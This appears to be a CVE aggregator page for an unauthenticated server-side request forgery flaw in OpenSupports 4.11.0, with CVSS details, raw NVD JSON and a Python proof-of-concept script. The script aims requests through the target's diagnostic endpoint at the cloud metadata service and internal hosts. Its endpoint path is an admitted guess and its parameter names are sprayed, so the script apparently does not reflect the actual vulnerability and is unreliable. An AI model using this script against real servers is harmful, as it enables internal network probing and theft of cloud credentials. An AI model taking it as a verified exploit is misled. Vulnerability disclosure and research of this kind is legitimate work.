Security Vulnerability Report
中文
CVE-2025-10695 CVSS 5.3 MEDIUM

CVE-2025-10695

Published: 2025-10-03 21:15:33
Last Modified: 2025-12-22 13:45:20

Description

Two unauthenticated diagnostic endpoints allow arbitrary backend-initiated network connections to an attacker‑supplied destination. Both endpoints are exposed with permission => 'any', enabling unauthenticated SSRF for internal network scanning and service interaction. This issue affects OpenSupports: 4.11.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:opensupports:opensupports:4.11.0:*:*:*:*:*:*:* - VULNERABLE
OpenSupports 4.11.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10695 - OpenSupports SSRF PoC # Unauthenticated SSRF via diagnostic endpoints import requests TARGET = "http://target-opensupports-server.com" # Replace with the actual diagnostic endpoint path discovered in OpenSupports DIAGNOSTIC_ENDPOINT = "/api/diagnostic/connect" # example path # Internal target for SSRF (e.g., internal network scan or metadata service) INTERNAL_TARGET = "http://169.254.169.254/latest/meta-data/" # AWS metadata # INTERNAL_TARGET = "http://192.168.1.1/admin" # Internal admin panel # INTERNAL_TARGET = "http://127.0.0.1:8080/internal-api" # Local service def exploit_ssrf(target_url, internal_url): """ Exploit unauthenticated SSRF in OpenSupports diagnostic endpoint. The endpoint accepts a URL parameter and triggers a backend request. """ url = f"{target_url}{DIAGNOSTIC_ENDPOINT}" params = { "url": internal_url, "host": internal_url, "address": internal_url, } try: # No authentication required - permission => 'any' response = requests.get(url, params=params, timeout=10) print(f"[+] Status Code: {response.status_code}") print(f"[+] Response Body:\n{response.text[:2000]}") return response.text except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": print("[*] CVE-2025-10695 - OpenSupports Unauthenticated SSRF") print(f"[*] Target: {TARGET}") print(f"[*] Internal Target: {INTERNAL_TARGET}") result = exploit_ssrf(TARGET, INTERNAL_TARGET) if result and "meta-data" in result.lower(): print("[+] SSRF successful! Cloud metadata accessible.") elif result: print("[+] SSRF request completed. Check response for sensitive data.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10695", "sourceIdentifier": "[email protected]", "published": "2025-10-03T21:15:33.353", "lastModified": "2025-12-22T13:45:19.913", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Two unauthenticated diagnostic endpoints allow arbitrary backend-initiated network connections to an attacker‑supplied destination. Both endpoints are exposed with permission => 'any', enabling unauthenticated SSRF for internal network scanning and service interaction.\n\nThis issue affects OpenSupports: 4.11.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensupports:opensupports:4.11.0:*:*:*:*:*:*:*", "matchCriteriaId": "79B3C4CE-1AEE-44B6-BDEC-726B28A99A89"}]}]}], "references": [{"url": "https://fluidattacks.com/advisories/freer", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/opensupports/opensupports", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://fluidattacks.com/advisories/freer", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}